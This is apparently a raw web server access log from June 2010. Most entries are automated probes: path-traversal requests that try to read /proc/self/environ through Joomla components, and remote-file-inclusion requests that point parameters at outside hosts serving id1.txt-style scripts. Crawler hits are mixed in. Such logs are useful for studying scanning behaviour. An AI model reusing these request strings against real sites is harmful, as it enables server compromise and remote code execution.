64.251.10.117 - - [02/Jun/2010:01:56:16 -0500] "GET /index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
87.250.255.243 - - [02/Jun/2010:01:56:53 -0500] "GET /logs/access_log.1262908800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.23.52.128 - - [02/Jun/2010:01:58:38 -0500] "GET /logs/index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.52.128 - - [02/Jun/2010:01:58:39 -0500] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
89.238.145.196 - - [02/Jun/2010:01:59:39 -0500] "GET /logs/index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
89.238.145.196 - - [02/Jun/2010:01:59:40 -0500] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
207.46.12.214 - - [02/Jun/2010:02:05:39 -0500] "GET /logs/?D=A HTTP/1.1" 200 7924 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.04506.648)"
67.195.112.180 - - [02/Jun/2010:02:08:53 -0500] "GET /logs/access_log.1164412800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.65.59 - - [02/Jun/2010:02:09:32 -0500] "GET /costume/026_JPG%20copy.jpg HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
188.92.75.82 - - [02/Jun/2010:02:09:36 -0500] "GET /logs/access_log.1273363200 HTTP/1.1" 200 338146 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.108.172.26 - - [02/Jun/2010:02:09:58 -0500] "GET /logs//index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
189.108.172.26 - - [02/Jun/2010:02:09:58 -0500] "GET //index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
207.46.199.45 - - [02/Jun/2010:02:10:10 -0500] "GET /logs/access_log.1206576000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
189.108.172.26 - - [02/Jun/2010:02:13:07 -0500] "GET /logs/access_log.1274832000//index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
189.108.172.26 - - [02/Jun/2010:02:13:07 -0500] "GET //index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
189.108.172.26 - - [02/Jun/2010:02:13:08 -0500] "GET /logs//index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
207.46.199.42 - - [02/Jun/2010:02:13:11 -0500] "GET /logs/?D=D HTTP/1.1" 200 7924 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.124.198.60 - - [02/Jun/2010:02:15:53 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.124.198.60 - - [02/Jun/2010:02:15:53 -0500] "GET /logs/access_log.1274832000%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
74.124.198.60 - - [02/Jun/2010:02:15:53 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
202.72.242.242 - - [02/Jun/2010:02:17:06 -0500] "GET /logs///bbs///write_comment_update.php?board_skin_path=http://www.bartonancestry.com/gen/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
202.72.242.242 - - [02/Jun/2010:02:17:06 -0500] "GET ///bbs///write_comment_update.php?board_skin_path=http://www.bartonancestry.com/gen/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
202.72.242.242 - - [02/Jun/2010:02:17:06 -0500] "GET /logs/access_log.1271548800///bbs///write_comment_update.php?board_skin_path=http://www.bartonancestry.com/gen/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
216.129.119.43 - - [02/Jun/2010:02:18:25 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
74.124.198.60 - - [02/Jun/2010:02:21:15 -0500] "GET /logs/access_log.1274832000/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
74.53.72.50 - - [02/Jun/2010:02:22:27 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
74.53.72.50 - - [02/Jun/2010:02:22:27 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
189.108.172.26 - - [02/Jun/2010:02:23:07 -0500] "GET /logs/access_log.1274572800//index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
189.108.172.26 - - [02/Jun/2010:02:23:07 -0500] "GET //index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
189.108.172.26 - - [02/Jun/2010:02:23:08 -0500] "GET /logs//index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
189.108.172.26 - - [02/Jun/2010:02:23:14 -0500] "GET /logs/access_log.1274832000//index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
66.249.65.59 - - [02/Jun/2010:02:23:41 -0500] "GET /costume/035_JPG%20copy.jpg HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
89.238.145.196 - - [02/Jun/2010:02:24:55 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
89.238.145.196 - - [02/Jun/2010:02:24:55 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
207.46.199.39 - - [02/Jun/2010:02:26:40 -0500] "GET /logs/access_log.1161129600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
194.32.151.185 - - [02/Jun/2010:02:27:48 -0500] "GET /logs/access_log.1271462400/?option=com_jinventory&controller=http://www.tourfox.ch/1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:02:27:48 -0500] "GET /?option=com_jinventory&controller=http://www.tourfox.ch/1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:02:27:48 -0500] "GET /logs/?option=com_jinventory&controller=http://www.tourfox.ch/1.txt?? HTTP/1.1" 200 7924 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:02:27:50 -0500] "GET /logs/access_log.1271462400/?option=com_jinventory&controller=http://www.tourfox.ch/1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:02:27:50 -0500] "GET /?option=com_jinventory&controller=http://www.tourfox.ch/1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:02:27:50 -0500] "GET /logs/?option=com_jinventory&controller=http://www.tourfox.ch/1.txt?? HTTP/1.1" 200 7924 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:02:28:04 -0500] "GET /?option=com_jinventory&controller=http://www.tourfox.ch/1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:02:28:05 -0500] "GET /logs/?option=com_jinventory&controller=http://www.tourfox.ch/1.txt?? HTTP/1.1" 200 7924 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:02:28:05 -0500] "GET /logs/access_log.1271462400/?option=com_jinventory&controller=http://www.tourfox.ch/1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
89.238.145.196 - - [02/Jun/2010:02:29:32 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
89.238.145.196 - - [02/Jun/2010:02:29:32 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
74.53.72.50 - - [02/Jun/2010:02:30:00 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
74.53.72.50 - - [02/Jun/2010:02:30:00 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
74.53.72.50 - - [02/Jun/2010:02:30:00 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
67.195.112.180 - - [02/Jun/2010:02:31:28 -0500] "GET /logs/access_log.1238889600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [02/Jun/2010:02:31:35 -0500] "GET /logs/access_log.1216857600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.137 - - [02/Jun/2010:02:34:41 -0500] "GET /logs/access_log.1261785600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
202.72.242.242 - - [02/Jun/2010:02:35:07 -0500] "GET /logs/access_log.1271548800///bbs///write_comment_update.php?board_skin_path=http://www.bartonancestry.com/gen/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
202.72.242.242 - - [02/Jun/2010:02:35:07 -0500] "GET ///bbs///write_comment_update.php?board_skin_path=http://www.bartonancestry.com/gen/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
202.72.242.242 - - [02/Jun/2010:02:35:07 -0500] "GET /logs///bbs///write_comment_update.php?board_skin_path=http://www.bartonancestry.com/gen/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
74.53.72.50 - - [02/Jun/2010:02:35:17 -0500] "GET /logs/access_log.1274832000/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
74.53.72.50 - - [02/Jun/2010:02:35:17 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
74.53.72.50 - - [02/Jun/2010:02:35:17 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
207.46.199.178 - - [02/Jun/2010:02:35:50 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
202.72.242.242 - - [02/Jun/2010:02:36:28 -0500] "GET ///bbs///write_comment_update.php?board_skin_path=http://www.bartonancestry.com/gen/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
202.72.242.242 - - [02/Jun/2010:02:36:28 -0500] "GET /logs///bbs///write_comment_update.php?board_skin_path=http://www.bartonancestry.com/gen/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
202.72.242.242 - - [02/Jun/2010:02:36:28 -0500] "GET /logs/access_log.1271548800///bbs///write_comment_update.php?board_skin_path=http://www.bartonancestry.com/gen/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
207.46.204.244 - - [02/Jun/2010:02:41:43 -0500] "GET /logs/access_log.1239321600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.88.4.141 - - [02/Jun/2010:02:42:17 -0500] "GET /logs/access_log.1274313600%20%20/home.php?pagina=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.88.4.141 - - [02/Jun/2010:02:42:17 -0500] "GET /home.php?pagina=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
121.88.4.141 - - [02/Jun/2010:02:42:20 -0500] "GET /logs/home.php?pagina=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
58.230.162.220 - - [02/Jun/2010:02:44:56 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
58.230.162.220 - - [02/Jun/2010:02:44:56 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
210.109.108.186 - - [02/Jun/2010:02:47:26 -0500] "GET /logs/index.php?option=reflect_base&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
210.109.108.186 - - [02/Jun/2010:02:47:26 -0500] "GET /index.php?option=reflect_base&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
67.205.124.43 - - [02/Jun/2010:02:52:52 -0500] "GET /%22index.php?option=com_g2bridge%22../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.251.10.117 - - [02/Jun/2010:02:52:58 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
64.251.10.117 - - [02/Jun/2010:02:52:59 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
64.251.10.117 - - [02/Jun/2010:02:53:01 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
64.251.10.117 - - [02/Jun/2010:02:53:01 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
58.230.162.220 - - [02/Jun/2010:02:55:34 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
58.230.162.220 - - [02/Jun/2010:02:55:34 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
58.230.162.220 - - [02/Jun/2010:02:55:34 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
58.230.162.220 - - [02/Jun/2010:02:55:34 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
58.230.162.220 - - [02/Jun/2010:02:55:35 -0500] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
58.230.162.220 - - [02/Jun/2010:02:55:35 -0500] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
114.108.177.125 - - [02/Jun/2010:02:55:54 -0500] "GET /logs///bbs///write_comment_update.php?board_skin_path=http://www.kangnung.org//zb//s1.txt%20? HTTP/1.1" 404 321 "-""Mozilla/5.0"
114.108.177.125 - - [02/Jun/2010:02:55:55 -0500] "GET ///bbs///write_comment_update.php?board_skin_path=http://www.kangnung.org//zb//s1.txt%20? HTTP/1.1" 404 316 "-""Mozilla/5.0"
114.108.177.125 - - [02/Jun/2010:02:55:55 -0500] "GET /logs/access_log.1271548800///bbs///write_comment_update.php?board_skin_path=http://www.kangnung.org//zb//s1.txt%20? HTTP/1.1" 404 343 "-""Mozilla/5.0"
216.129.119.43 - - [02/Jun/2010:02:56:14 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
69.175.33.194 - - [02/Jun/2010:02:56:18 -0500] "GET /logs//index2.php?option=com_myblog&task=http://dancingforcancer.com///g466/Ckrid1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
69.175.33.194 - - [02/Jun/2010:02:56:18 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_myblog&task=http://dancingforcancer.com///g466/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
69.175.33.194 - - [02/Jun/2010:02:56:18 -0500] "GET //index2.php?option=com_myblog&task=http://dancingforcancer.com///g466/Ckrid1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
69.175.33.194 - - [02/Jun/2010:02:56:22 -0500] "GET //index2.php?option=com_myblog&task=http://dancingforcancer.com///g466/Ckrid1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
69.175.33.194 - - [02/Jun/2010:02:56:22 -0500] "GET /logs//index2.php?option=com_myblog&task=http://dancingforcancer.com///g466/Ckrid1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
69.175.33.194 - - [02/Jun/2010:02:56:22 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_myblog&task=http://dancingforcancer.com///g466/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
91.121.145.89 - - [02/Jun/2010:02:57:43 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [02/Jun/2010:02:57:43 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
64.251.10.117 - - [02/Jun/2010:02:57:54 -0500] "GET /logs/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
64.251.10.117 - - [02/Jun/2010:02:57:54 -0500] "GET /index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
77.92.74.100 - - [02/Jun/2010:02:58:16 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
77.92.74.100 - - [02/Jun/2010:02:58:17 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
77.92.74.100 - - [02/Jun/2010:02:58:17 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
77.92.74.100 - - [02/Jun/2010:02:58:17 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
91.121.145.89 - - [02/Jun/2010:02:58:33 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [02/Jun/2010:02:58:46 -0500] "GET /logs/access_log.1274832000/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.121.145.89 - - [02/Jun/2010:02:58:46 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [02/Jun/2010:02:58:46 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
64.251.10.117 - - [02/Jun/2010:02:58:59 -0500] "GET /logs/access_log.1274832000/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
64.251.10.117 - - [02/Jun/2010:02:58:59 -0500] "GET /index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
64.251.10.117 - - [02/Jun/2010:02:58:59 -0500] "GET /logs/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
67.205.124.43 - - [02/Jun/2010:03:00:00 -0500] "GET /logs/access_log.1274832000/%22index.php?option=com_g2bridge%22../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.205.124.43 - - [02/Jun/2010:03:00:00 -0500] "GET /%22index.php?option=com_g2bridge%22../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.205.124.43 - - [02/Jun/2010:03:00:00 -0500] "GET /logs/%22index.php?option=com_g2bridge%22../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
87.250.255.243 - - [02/Jun/2010:03:01:13 -0500] "GET /costume/thmb6.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.47 - - [02/Jun/2010:03:01:19 -0500] "GET /logs/access_log.1203379200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.205.124.43 - - [02/Jun/2010:03:02:27 -0500] "GET /logs/access_log.1274832000/%22index.php?option=com_g2bridge%22../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.205.124.43 - - [02/Jun/2010:03:02:27 -0500] "GET /%22index.php?option=com_g2bridge%22../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.205.124.43 - - [02/Jun/2010:03:02:27 -0500] "GET /logs/%22index.php?option=com_g2bridge%22../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
207.46.199.51 - - [02/Jun/2010:03:05:32 -0500] "GET /logs/access_log.1271376000 HTTP/1.1" 200 664329 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
194.32.151.185 - - [02/Jun/2010:03:05:49 -0500] "GET /logs/?option=com_gcalendar&controller=http://www.tourfox.ch/1.txt?? HTTP/1.1" 200 7924 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:03:05:49 -0500] "GET /?option=com_gcalendar&controller=http://www.tourfox.ch/1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:03:05:49 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=http://www.tourfox.ch/1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:03:07:04 -0500] "GET /logs/access_log.1273363200/?option=com_gcalendar&controller=http://www.tourfox.ch/1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:03:08:34 -0500] "GET /?option=com_gcalendar&controller=http://www.tourfox.ch/1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:03:08:34 -0500] "GET /logs/?option=com_gcalendar&controller=http://www.tourfox.ch/1.txt?? HTTP/1.1" 200 7924 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:03:08:34 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=http://www.tourfox.ch/1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:03:10:06 -0500] "GET /logs/access_log.1273363200/?option=com_gcalendar&controller=http://www.tourfox.ch/1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
80.233.172.42 - - [02/Jun/2010:03:13:04 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [02/Jun/2010:03:13:04 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
120.50.40.133 - - [02/Jun/2010:03:13:11 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
120.50.40.133 - - [02/Jun/2010:03:13:12 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
80.233.172.42 - - [02/Jun/2010:03:13:17 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [02/Jun/2010:03:13:17 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
66.223.110.205 - - [02/Jun/2010:03:13:21 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
66.223.110.205 - - [02/Jun/2010:03:13:21 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
120.50.40.133 - - [02/Jun/2010:03:13:36 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
120.50.40.133 - - [02/Jun/2010:03:13:36 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
120.50.40.133 - - [02/Jun/2010:03:13:37 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
120.50.40.133 - - [02/Jun/2010:03:13:38 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
66.223.110.205 - - [02/Jun/2010:03:13:48 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
